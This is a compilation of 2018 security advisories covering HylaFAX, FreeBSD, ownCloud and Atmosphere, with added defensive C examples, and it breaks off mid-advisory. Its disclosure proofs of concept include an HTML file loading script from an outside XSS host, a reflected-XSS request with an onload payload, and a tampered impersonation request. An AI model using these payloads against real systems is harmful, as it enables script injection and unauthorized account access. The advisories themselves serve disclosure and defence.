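The blacklist is the wrong shape for this problem: it enumerates what the author remembered of the shell's grammar, while the allowlist describes the data and rejects everything else, so a forgotten operator cannot slip through.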
X41 D-Sec GmbH Security Advisory X41-2018-008: Multiple Vulnerabilities in HylaFAX
X41 D-SEC GmbH Security Advisory: X41-2018-008

Multiple Vulnerabilities in HylaFAX
===================================

Overview
--------
Confirmed Affected Versions: HylaFAX 6.0.6, HylaFAX+ 5.6.0
Confirmed Patched Versions: HylaFAX 6.0.7, HylaFAX+ 5.6.1
Vendor: Hylafax, Hylafax+
Vendor URL: https://www.hylafax.org/, http://hylafax.sourceforge.net/
Credit: X41 D-SEC GmbH, Luis Merino, Eric Sesterhenn, Markus Vervier
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-008-Hylafax/

Summary and Impact
------------------
Severity Rating: Critical
Vector: Incoming fax call
CVE: CVE-2018-17141
CWE: 122, 457
CVSS Score: 9.0
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Multiple bugs were found in the code handling fax page reception in JPEG
format that allow arbitrary writes to an uninitialized pointer by remote
parties dialing in. When processing a specially crafted input, the issue
could lead to remote code execution.

Although JPEG reception is not announced as an available capability by
HylaFAX and is explicitly disabled during capabilities announcement, there
is code for JPEG support in HylaFAX that can be reached by a remote party
when setting certain flags during session negotiation.

X41 did not perform a full test or audit on the software.

Product Description
-------------------
HylaFAX is an open-source system for sending and receiving faxes using one
or multiple fax modems.

Analysis
--------
X41 discovered several vulnerabilities in HylaFAX that are exploitable by
local or remote attackers.

Uninitialized pointer write in FaxModem::writeECMData()
-------------------------------------------------------
In CopyQuality.c++:990 recvRow is initialized only when params.jp is exactly
JP_GREY or JP_COLOR and params.df is exactly zero.

{% highlight c %}
uint dataform = params.df + (params.jp ? params.jp + 4 : 0);
//...
switch (dataform) {
//...
    case JPGREY+4:
    case JPCOLOR+4:
        recvEOLCount = 0;
        recvRow = (uchar*) malloc(1024*1000);    // 1M should do it?
{% endhighlight %}

However, later in the same function recvRow is used as a target for memcpy()
when params.jp is JP_GREY or JP_COLOR, irrespective of params.df.
Consequently, if a sender crafts a DCS signal that leads to params.df being
non-zero while params.jp is JP_GREY or JP_COLOR, then recvRow will be
uninitialized when it is used as a target for memcpy().

{% highlight c %}
if (params.jp != JPGREY && params.jp != JPCOLOR) {
    flushRawData(tif, 0, (const u_char*) buf, cc);
} else {
    memcpy(recvRow, (const char*) buf, cc);
    recvRow += cc;
}
{% endhighlight %}

Out of bounds write in FaxModem::writeECMData()
-----------------------------------------------
The same piece of code for memcpy at CopyQuality.c++:1045 can be abused to
perform an out of bounds write to recvRow, as there is no bounds check
before writing to and incrementing recvRow. This can lead to remote code
execution when an attacker sends a specially crafted input.

Out of bounds write in FaxModem::recvPageDLEData()
--------------------------------------------------
CopyQuality.c++:446 presents another unbounded memcpy that can be abused to
perform an out of bounds write to recvRow.

{% highlight c %}
if (n >= RCVBUFSIZ)
    flushRawData(tif, 0, (const u_char*) raw, n);
else {
    memcpy(recvRow, (const char*) raw, n);
    recvRow += n;
}
{% endhighlight %}

The code doesn't seem to be reachable, as the JPEG flag forces ECM
reception.

Workaround
----------
None.

Timeline
--------
2018-06-07 Issues found
2018-08-24 Issue reported to vendor
2018-09-02 Vendor sends patches
2018-09-17 CVE ID assigned
2018-09-18 Patches released
2018-09-19 Advisory released

External links
--------------
See https://www.x41-dsec.de/lab/blog/fax/ for a blog post related to this
advisory.
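The three HylaFAX findings share one root cause: incoming bytes are copied to recvRow without checking that the buffer was ever allocated or that the bytes fit in it. The following C program is an added example, not HylaFAX code: it models the writeECMData() accumulator with explicit length and capacity fields, allocates whenever JPEG mode is negotiated regardless of params.df, and refuses a frame that would overrun. The type and function names (fax_params, fax_recv, recv_ecm_data) are illustrative, and the 1024-byte frames are constructed input.

```c
/* Added example (not HylaFAX code): a bounded receive-row accumulator in the
 * shape of FaxModem::writeECMData(), with the two checks the advisory says
 * are missing. */
#include <stdlib.h>
#include <string.h>

#define JPGREY  1
#define JPCOLOR 2
#define RECVROW_CAP (1024 * 1000)   /* same 1M sizing as the original */
#define FRAME_LEN   1024            /* constructed frame size */

typedef struct {
    int df;   /* data format negotiated in DCS */
    int jp;   /* JPEG mode: 0, JPGREY or JPCOLOR */
} fax_params;

typedef struct {
    unsigned char *recvRow;   /* accumulated JPEG page data */
    size_t recvRowLen;        /* bytes stored so far */
    size_t recvRowCap;        /* bytes allocated */
} fax_recv;

/* Allocate whenever JPEG reception is in effect, independent of params.df
 * (the original only did so for dataform == JPGREY+4 or JPCOLOR+4). */
int recv_begin(fax_recv *r, const fax_params *p)
{
    memset(r, 0, sizeof *r);
    if (p->jp == JPGREY || p->jp == JPCOLOR) {
        r->recvRow = malloc(RECVROW_CAP);
        if (r->recvRow == NULL)
            return -1;
        r->recvRowCap = RECVROW_CAP;
    }
    return 0;
}

/* 0 on success; -1 if there is no buffer or the frame would not fit. */
int recv_ecm_data(fax_recv *r, const fax_params *p,
                  const unsigned char *buf, size_t cc)
{
    if (p->jp != JPGREY && p->jp != JPCOLOR)
        return 0;   /* non-JPEG data goes to flushRawData() in the original */
    if (r->recvRow == NULL)
        return -1;  /* the uninitialised-pointer case */
    if (cc > r->recvRowCap - r->recvRowLen)
        return -1;  /* the out-of-bounds write case */
    memcpy(r->recvRow + r->recvRowLen, buf, cc);
    r->recvRowLen += cc;
    return 0;
}

void recv_end(fax_recv *r)
{
    free(r->recvRow);
    r->recvRow = NULL;
    r->recvRowLen = r->recvRowCap = 0;
}

/* Negotiate (df, jp), then feed `frames` constructed frames; returns the
 * result of the last call: 0 if everything fitted, -1 if one was rejected. */
int feed_frames(int df, int jp, size_t frames)
{
    fax_params p = { df, jp };
    fax_recv r;
    unsigned char frame[FRAME_LEN];
    int rc;
    memset(frame, 0xAB, sizeof frame);
    rc = recv_begin(&r, &p);
    while (rc == 0 && frames-- > 0)
        rc = recv_ecm_data(&r, &p, frame, sizeof frame);
    recv_end(&r);
    return rc;
}

/* What happens if data arrives before any allocation took place. */
int feed_without_begin(int jp)
{
    fax_params p = { 0, jp };
    fax_recv r = { NULL, 0, 0 };
    unsigned char frame[FRAME_LEN] = { 0 };
    return recv_ecm_data(&r, &p, frame, sizeof frame);
}
```

Tracking length and capacity next to the pointer is what makes the check possible at all; the original advances a bare pointer, so by the time memcpy() runs there is nothing left to compare against.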
FreeBSD Security Advisory FreeBSD-SA-18:12.elf
=============================================================================
FreeBSD-SA-18:12.elf                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Improper ELF header parsing

Category:       core
Module:         kernel
Announced:      2018-09-12
Credits:        Thomas Barabosch, Fraunhofer FKIE; Mark Johnston
Affects:        All supported versions of FreeBSD.
Corrected:      2018-09-12 05:02:11 UTC (stable/11, 11.1-STABLE)
                2018-09-12 05:07:35 UTC (releng/11.2, 11.2-RELEASE-p3)
                2018-09-12 05:07:35 UTC (releng/11.1, 11.1-RELEASE-p14)
                2018-09-12 05:03:30 UTC (stable/10, 10.4-STABLE)
                2018-09-12 05:07:35 UTC (releng/10.4, 10.4-RELEASE-p12)
CVE Name:       CVE-2018-6924

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/.

I.   Background

To execute a binary the kernel must parse the ELF header to determine the
entry point address, the program interpreter, and other parameters.

II.  Problem Description

Insufficient validation was performed in the ELF header parser, and
malformed or otherwise invalid ELF binaries were not rejected as they
should be.

III. Impact

Execution of a malicious ELF binary may result in a kernel crash or may
disclose kernel memory.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +30 "Rebooting for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-18:12/elf.patch
# fetch https://security.FreeBSD.org/patches/SA-18:12/elf.patch.asc
# gpg --verify elf.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/10/                                                        r338605
releng/10.4/                                                      r338606
stable/11/                                                        r338604
releng/11.1/                                                      r338606
releng/11.2/                                                      r338606
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6924

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-18:12.elf.asc
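The advisory does not name the fields whose validation was insufficient, so the following C program is an added example of the checks an ELF loader generally needs before it trusts a header, not FreeBSD's fix: magic and class, the header's own size, the program and section header entry sizes, and that each table's offset plus count times entry size lies inside the image without integer wraparound. The structure is declared locally so the program builds without <elf.h>; check_constructed() assembles a synthetic image to exercise the validator.

```c
/* Added example (not FreeBSD kernel code): header validation an ELF loader
 * should perform before using the file's own offsets and counts. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

typedef struct {
    unsigned char e_ident[16];
    uint16_t e_type;
    uint16_t e_machine;
    uint32_t e_version;
    uint64_t e_entry;
    uint64_t e_phoff;
    uint64_t e_shoff;
    uint32_t e_flags;
    uint16_t e_ehsize;
    uint16_t e_phentsize;
    uint16_t e_phnum;
    uint16_t e_shentsize;
    uint16_t e_shnum;
    uint16_t e_shstrndx;
} elf64_ehdr;                       /* 64 bytes, no padding */

#define ELF64_PHDR_SIZE 56
#define ELF64_SHDR_SIZE 64

enum elf_err { ELF_OK = 0, ELF_TOO_SHORT, ELF_BAD_MAGIC, ELF_BAD_CLASS,
               ELF_BAD_EHSIZE, ELF_BAD_PHENTSIZE, ELF_PHDRS_OUT_OF_RANGE,
               ELF_BAD_SHENTSIZE, ELF_SHDRS_OUT_OF_RANGE };

/* True if [off, off + count*entsize) lies within len, with both the
 * multiplication and the addition checked for wraparound. Callers only pass
 * a non-zero count together with a non-zero entsize. */
static int table_in_range(uint64_t off, uint64_t count, uint64_t entsize, size_t len)
{
    uint64_t bytes;
    if (count == 0)
        return 1;
    if (count > UINT64_MAX / entsize)
        return 0;
    bytes = count * entsize;
    if (off > UINT64_MAX - bytes)
        return 0;
    return off + bytes <= (uint64_t)len;
}

int validate_elf64_header(const unsigned char *img, size_t len)
{
    elf64_ehdr h;
    if (len < sizeof h) return ELF_TOO_SHORT;
    memcpy(&h, img, sizeof h);                       /* no unaligned reads */
    if (memcmp(h.e_ident, "\x7fELF", 4) != 0) return ELF_BAD_MAGIC;
    if (h.e_ident[4] != 2) return ELF_BAD_CLASS;     /* ELFCLASS64 */
    if (h.e_ehsize != sizeof h) return ELF_BAD_EHSIZE;
    if (h.e_phnum != 0 && h.e_phentsize != ELF64_PHDR_SIZE) return ELF_BAD_PHENTSIZE;
    if (!table_in_range(h.e_phoff, h.e_phnum, h.e_phentsize, len)) return ELF_PHDRS_OUT_OF_RANGE;
    if (h.e_shnum != 0 && h.e_shentsize != ELF64_SHDR_SIZE) return ELF_BAD_SHENTSIZE;
    if (!table_in_range(h.e_shoff, h.e_shnum, h.e_shentsize, len)) return ELF_SHDRS_OUT_OF_RANGE;
    return ELF_OK;
}

/* Constructed image: a header claiming `declared_phnum` program headers at
 * `phoff`, followed by `actual_phnum` zeroed ones. Returns the verdict. */
int check_constructed(uint16_t declared_phnum, uint16_t actual_phnum,
                      uint64_t phoff, uint16_t phentsize)
{
    static unsigned char img[4096];
    elf64_ehdr h;
    size_t len = sizeof h + (size_t)actual_phnum * ELF64_PHDR_SIZE;
    if (len > sizeof img) return -1;
    memset(img, 0, sizeof img);
    memset(&h, 0, sizeof h);
    memcpy(h.e_ident, "\x7fELF", 4);
    h.e_ident[4] = 2;                /* ELFCLASS64 */
    h.e_ident[5] = 1;                /* ELFDATA2LSB */
    h.e_ident[6] = 1;                /* EV_CURRENT */
    h.e_type = 2;                    /* ET_EXEC */
    h.e_machine = 62;                /* EM_X86_64 */
    h.e_version = 1;
    h.e_ehsize = (uint16_t)sizeof h;
    h.e_phoff = phoff;
    h.e_phentsize = phentsize;
    h.e_phnum = declared_phnum;
    memcpy(img, &h, sizeof h);
    return validate_elf64_header(img, len);
}
```

The wraparound guard in table_in_range() is the part most often missing in practice: e_phoff near the top of the 64-bit range plus a small table size wraps to a tiny number and passes a naive `off + bytes <= len` test.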
CSNC-2018-015 - ownCloud Impersonate - Authorization Bypass
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  ownCloud Impersonate
# Vendor:   ownCloud
# CSNC ID:  CSNC-2018-015
# CVE ID:   N/A
# Subject:  Authorization bypass
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Thierry Viaccoz
# Date:     29.08.2018
#
#############################################################

Introduction:
-------------
ownCloud [1] is a suite of client-server software for creating file hosting
services and using them. An app called Impersonate [2] was created to allow
administrators to impersonate other users. According to the documentation
[3], group admins should only be able to access users of the groups they
are administrator of.

Compass Security discovered that it was possible for a group admin to
impersonate any user, except global administrators. This way, group admins
have access to data of users of other groups, even though they shouldn't.

Affected:
---------
Vulnerable:
 * Version 0.1.2

Not vulnerable:
 * Version 0.2.0

No other version was tested, but it is believed that older versions are
vulnerable too.

Technical Description
---------------------
In order to reproduce the vulnerability, follow the steps below.

Create two groups:
 * group1
 * group2

Create four users as follows:
 * test1; group = group1; group admin = group1
 * test2; group = group1; group admin = no group
 * test3; group = group2; group admin = group2
 * test4; group = group2; group admin = no group

Activate the Impersonate app in Settings > Admin > Apps.

Go to Settings > Admin > Apps > User Authentication, check "Allow group
admins to impersonate users from these groups" and add the two groups
"group1" and "group2".

Log in with "test1", open the user page and impersonate the user "test2".
There, intercept the POST request to /apps/impersonate/user and replace
"target=test2" by "target=test3" in the body as shown below. As a result,
the user "test1" will impersonate the user "test3", even though "test1" is
only group admin of "group1" and "test3" is not in this group.

Request:
========
POST /apps/impersonate/user HTTP/1.1
Host: demo.owncloud.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken: [CUT]
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 12
Cookie: [CUT]
Connection: close

target=test3
========

Response:
=========
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-Length: 2
Content-Security-Policy: default-src 'none';manifest-src 'self';script-src 'self' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: blob:;font-src 'self';connect-src 'self';media-src 'self'
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Mar 2018 15:21:14 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Strict-Transport-Security: max-age=15768000; preload
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: none
X-Xss-Protection: 1; mode=block
Connection: close

[]
=========

Workaround / Fix:
-----------------
Check the authorization consistently to prevent group admins from
impersonating users from other groups.

Timeline:
---------
2018-08-29: Coordinated public disclosure date
2018-04-17: Release of fixed version 0.2.0
2018-03-16: Initial vendor response
2018-03-16: Initial vendor notification
2018-03-15: Discovery by Thierry Viaccoz

References:
-----------
[1] https://owncloud.org/
[2] https://marketplace.owncloud.com/apps/impersonate
[3] https://doc.owncloud.org/server/10.0/admin_manual/issues/impersonate_users.html
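The fix section asks for a consistent authorization check. The following C program is an added example, not ownCloud's code: it encodes the advisory's four test users and two groups, a function with the behaviour observed in 0.1.2 (once the actor is a group admin, any target that is not a global admin is accepted), and a corrected check that requires the target to belong to a group the actor administers and that is enabled for impersonation. The data model and function names are illustrative.

```c
/* Added example (not ownCloud code): the authorisation decision behind
 * "Allow group admins to impersonate users from these groups". */
#include <string.h>

#define MAX_GROUPS 4

typedef struct {
    const char *name;
    const char *groups[MAX_GROUPS];     /* groups the user belongs to (NULL-terminated) */
    const char *admin_of[MAX_GROUPS];   /* groups the user administers (NULL-terminated) */
    int is_global_admin;
} user;

static int in_list(const char *const *list, const char *item)
{
    for (int i = 0; i < MAX_GROUPS && list[i] != NULL; i++)
        if (strcmp(list[i], item) == 0)
            return 1;
    return 0;
}

/* Behaviour the advisory describes for Impersonate 0.1.2: being a group
 * admin at all is enough; only global admins are off-limits. */
int can_impersonate_v012(const user *actor, const user *target)
{
    if (actor->is_global_admin) return 1;
    if (actor->admin_of[0] == NULL) return 0;   /* not a group admin */
    return !target->is_global_admin;
}

/* Consistent check: some group must be administered by the actor, enabled
 * for impersonation in the settings, and contain the target. */
int can_impersonate_fixed(const user *actor, const user *target,
                          const char *const *allowed_groups)
{
    if (actor->is_global_admin) return 1;
    if (target->is_global_admin) return 0;
    for (int i = 0; i < MAX_GROUPS && actor->admin_of[i] != NULL; i++) {
        const char *g = actor->admin_of[i];
        if (in_list(allowed_groups, g) && in_list(target->groups, g))
            return 1;
    }
    return 0;
}

/* The advisory's reproduction setup, constructed here as data. */
const user test1 = { "test1", { "group1" }, { "group1" }, 0 };
const user test2 = { "test2", { "group1" }, { NULL },     0 };
const user test3 = { "test3", { "group2" }, { "group2" }, 0 };
const user test4 = { "test4", { "group2" }, { NULL },     0 };
const char *const allowed[] = { "group1", "group2", NULL };
```

With this data, test1 impersonating test2 is allowed by both functions, while test1 impersonating test3 passes the 0.1.2 logic and is refused by the corrected one; the request body's `target=` value is only ever consulted after the membership test succeeds.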
CSNC-2018-016 - ownCloud iOS Application - Cross-Site Scripting
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  ownCloud iOS Application (owncloud.iosapp) [1]
# Vendor:   ownCloud Gmbh
# CSNC ID:  CSNC-2018-016
# CVE ID:   N/A
# Subject:  Cross-Site Scripting in ownCloud iOS Application's WebViews
# Risk:     Low
# Effect:   Remotely exploitable
# Author:   Sylvain Heiniger
# Date:     14.08.2018
#
#############################################################

Introduction:
-------------
HTML pages are rendered in a WebView in the ownCloud iOS application.
JavaScript is executed in this WebView when previewing an HTML file.

The WebView runs in a sandbox, so a priori no other data can be read.
However, should the WebView itself have a vulnerability, an attacker could
access other data of the application. The HTML rendering could also be
misused for phishing.

Affected:
---------
Vulnerable:
 * ownCloud Version 3.7.3 for iOS

Not vulnerable:
 * ownCloud Android Application
 * ownCloud Server
 * ownCloud Version 3.7.5 for iOS

Technical Description
---------------------
Upload an HTML file to an ownCloud instance and open it in the iOS
application; the HTML gets interpreted.

$ cat test.html
<script src="https://hes.xss.ht"></script>
<script>alert("this JavaScript is interpreted!");</script>

$ dave -u admin -p [password] https://[your-instance].owncloud-demo.com/remote.php/webdav/
dave> put test.html
put https://7pswlqfpkn.owncloud-demo.com/remote.php/webdav/test.html (117 bytes) (success)

Workaround / Fix:
-----------------
Since iOS 8 the WKWebView class can be used instead of UIWebView. Setting
the WKPreferences property javaScriptEnabled to false prevents JavaScript
from being run. This fix has been implemented in release 3.7.5 [2].

Timeline:
---------
2018-08-14: Advisory publication
2018-07-09: Fix verification
2018-06-19: Release with fix publication
2018-03-16: Initial acknowledgment of the vulnerability
2018-03-14: Contact via HackerOne
2018-03-13: Discovery by Sylvain Heiniger

References:
-----------
[1] https://github.com/owncloud/ios
[2] https://github.com/owncloud/ios/releases/tag/version_3.7.5
CSNC-2018-023 - Atmosphere Framework - Reflected Cross-Site Scripting (XSS)
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
# Product:  Atmosphere [1]
# Vendor:   Async-IO.org
# CSNC ID:  CSNC-2018-023
# Subject:  Reflected Cross-Site Scripting (XSS)
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Lukasz D. (advisor...@compass-security.com)
# Date:     13.08.2018
#

Introduction:
-------------
The Atmosphere Framework is the most popular asynchronous application
development framework for enterprise Java. The Atmosphere Framework provides
the enterprise features required to build massively scalable and real-time
asynchronous applications using transports like WebSocket, Server Sent Events
and traditional Ajax techniques. [2]

Web applications using the Atmosphere Framework were found to be vulnerable to
a common security flaw that allows an attacker to execute malicious code in
the browser of users who followed a manipulated link to access the
application. Exploiting the vulnerability allows the attacker, for instance,
to redirect the user to a phishing page or to interact with the application on
behalf of the user.

Affected:
---------
The following Atmosphere versions are vulnerable:
 - 2.4.0 - 2.4.28
 - 2.3.0 - 2.3.9
 - 2.2.0 - 2.2.12
 - 2.1.0 - 2.1.13
 - 2.0.0 - 2.0.11
 - 1.0.0 - 1.0.20

Technical Description:
----------------------
The JSONP transport method supported by the Atmosphere Framework is vulnerable
to a reflected Cross-Site Scripting (XSS) attack. The JSONP callback parameter
that is put into the server's response can contain HTML code. As the response
does not specify a content type, browsers may treat it as an HTML page.

For example, Firefox 52 ESR executes the JavaScript payload reflected in the
response in the following proof of concept:

Request:

GET /chat?X-Atmosphere-Transport=jsonp&
    jsonpTransport=%3Chtml%3E%3Cbody%20onload=alert(`XSS`)%3E&
    X-Atmosphere-tracking-id=1&
    X-Atmosphere-Framework=1&
    X-atmo-protocol=true HTTP/1.1
Host: [CUT]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Response:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Atmosphere-tracking-id: 1
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Date: Mon, 16 Jul 2018 13:37:00 GMT
Connection: close
Content-Length: 52

<html><body onload=alert(`XSS`)>({"message" : "X"});

Workaround / Fix:
-----------------
It must be ensured that all JSONP responses are delivered with the correct
HTTP header: "Content-Type: application/javascript; charset=utf-8". Moreover,
the JSONP callback function name should not contain any non-alphanumeric
characters.

Timeline:
---------
2018-07-16: Vulnerability discovered
2018-07-18: Initial vendor notification
2018-07-18: Initial vendor response
2018-07-20: Patched version released
2018-08-13: Public disclosure

References:
-----------
[1]: https://github.com/Atmosphere
[2]: https://async-io.org/
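The two measures from the fix section, a strict callback whitelist and an explicit JavaScript content type, in the form of an added example. This is illustration code written for this page, not Atmosphere's own JSONP transport; the function names jsonp_callback_valid() and jsonp_response() and the 64-byte length limit are assumptions, and the X-Content-Type-Options header is an extra belt-and-braces step the advisory does not mention.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* A JSONP callback name is accepted only if it is non-empty, at most 64
 * bytes, starts like a JavaScript identifier and contains nothing but
 * [A-Za-z0-9_.]. Angle brackets, parentheses, quotes and whitespace are
 * all rejected, so HTML can never be reflected through this parameter. */
int jsonp_callback_valid(const char *cb)
{
    size_t n = strlen(cb);
    if (n == 0 || n > 64)
        return 0;
    if (!isalpha((unsigned char)cb[0]) && cb[0] != '_')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)cb[i];
        if (!isalnum(c) && c != '_' && c != '.')
            return 0;
    }
    return 1;
}

/* Renders a complete HTTP response for one JSONP reply into out. The
 * Content-Type is always application/javascript (plus nosniff), so even a
 * body that somehow contained markup would not be rendered as a page, and
 * the body is only produced for a validated callback. Returns the status. */
int jsonp_response(const char *cb, const char *json, char *out, size_t outsz)
{
    if (!jsonp_callback_valid(cb)) {
        snprintf(out, outsz,
                 "HTTP/1.1 400 Bad Request\r\n"
                 "Content-Type: text/plain; charset=utf-8\r\n"
                 "Content-Length: 16\r\n\r\n"
                 "invalid callback");
        return 400;
    }
    size_t body_len = strlen(cb) + 1 + strlen(json) + 2;   /* cb ( json ); */
    snprintf(out, outsz,
             "HTTP/1.1 200 OK\r\n"
             "Content-Type: application/javascript; charset=utf-8\r\n"
             "X-Content-Type-Options: nosniff\r\n"
             "Content-Length: %zu\r\n\r\n"
             "%s(%s);", body_len, cb, json);
    return 200;
}

int main(void)
{
    char buf[512];
    const char *json = "{\"message\" : \"X\"}";   /* constructed sample payload */
    jsonp_response("handleMsg", json, buf, sizeof buf);   /* accepted */
    puts(buf);
    jsonp_response("<b>cb", json, buf, sizeof buf);       /* rejected */
    puts(buf);
    return 0;
}
```

The whitelist is the decisive control: with it, the proof-of-concept callback above is refused before anything is reflected, and the content type only matters for callbacks that pass.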
FreeBSD Security Advisory FreeBSD-SA-18:11.hostapd
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-18:11.hostapd                                    Security Advisory
                                                          The FreeBSD Project

Topic:          Unauthenticated EAPOL-Key Decryption Vulnerability

Category:       contrib
Module:         wpa
Announced:      2018-08-14
Credits:        Mathy Vanhoef of the imec-DistriNet research group of
                KU Leuven
Affects:        All supported versions of FreeBSD.
Corrected:      2018-08-15 05:03:54 UTC (stable/11, 11.1-STABLE)
                2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2)
                2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13)
                2018-08-15 05:05:02 UTC (stable/10, 10.4-STABLE)
                2018-08-15 02:31:10 UTC (releng/10.4, 10.4-RELEASE-p11)
CVE Name:       CVE-2018-14526

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The wpa_supplicant(8) utility is a client (supplicant) with support for WPA
and WPA2 (IEEE 802.11i / RSN). It is suitable for desktop and laptop
computers as well as embedded systems. The supplicant is the IEEE 802.1X/WPA
component used in client stations. It implements key negotiation with a WPA
Authenticator and controls the roaming and IEEE 802.11
authentication/association of the wlan(4) driver.

The wpa_supplicant(8) utility is designed to be a "daemon" program that runs
in the background and acts as the backend component controlling the wireless
connection. The wpa_supplicant(8) utility supports separate frontend programs;
a text-based frontend (wpa_cli(8)) and a GUI (wpa_gui) are included with
wpa_supplicant(8).

II.  Problem Description

When using WPA2, for EAPOL-Key frames with the Encrypted flag set and without
the MIC flag set, the data field was decrypted first without verifying the
MIC. When the data field was encrypted using RC4, for example when negotiating
TKIP as a pairwise cipher, the unauthenticated but decrypted data was
subsequently processed.

This opened wpa_supplicant(8) to abuse by decryption and recovery of sensitive
information contained in EAPOL-Key messages.

See https://w1.fi/security/2018-1/unauthenticated-eapol-key-decryption.txt
for a detailed description of the bug.

III. Impact

All users of the WPA2 TKIP pairwise cipher are vulnerable to information
disclosure, for example of the group key.

IV.  Workaround

Remove TKIP as an allowed pairwise cipher in RSN/WPA2 networks in
wpa_supplicant.conf(5) by changing 'pairwise=CCMP TKIP' to 'pairwise=CCMP'.
This can also be mitigated by removing TKIP as a cipher on the AP.

Systems and users who do not use WPA2 TKIP are not affected.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd.patch
# fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd.patch.asc
# gpg --verify hostapd.patch.asc

[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:11/hostapd-10.patch.asc
# gpg --verify hostapd-10.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the applicable daemons, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/10/                                                        r337832
releng/10.4/                                                      r337829
stable/11/                                                        r337831
releng/11.1/                                                      r337828
releng/11.2/                                                      r337828
-------------------------------------------------------------------------
FreeBSD Security Advisory FreeBSD-SA-18:10.ip
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-18:10.ip                                         Security Advisory
                                                          The FreeBSD Project

Topic:          Resource exhaustion in IP fragment reassembly

Category:       core
Module:         inet
Announced:      2018-08-14
Credits:        Juha-Matti Tilli from Aalto University, Department of
                Communications and Networking and Nokia Bell Labs
Affects:        All supported versions of FreeBSD.
Corrected:      2018-08-14 18:17:05 UTC (stable/11, 11.1-STABLE)
                2018-08-15 02:30:11 UTC (releng/11.2, 11.2-RELEASE-p2)
                2018-08-15 02:30:11 UTC (releng/11.1, 11.1-RELEASE-p13)
CVE Name:       CVE-2018-6923

Special note:   Due to source code differences in FreeBSD 10-stable a patch
                is not yet available for FreeBSD 10.4. This will follow at a
                later date.

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
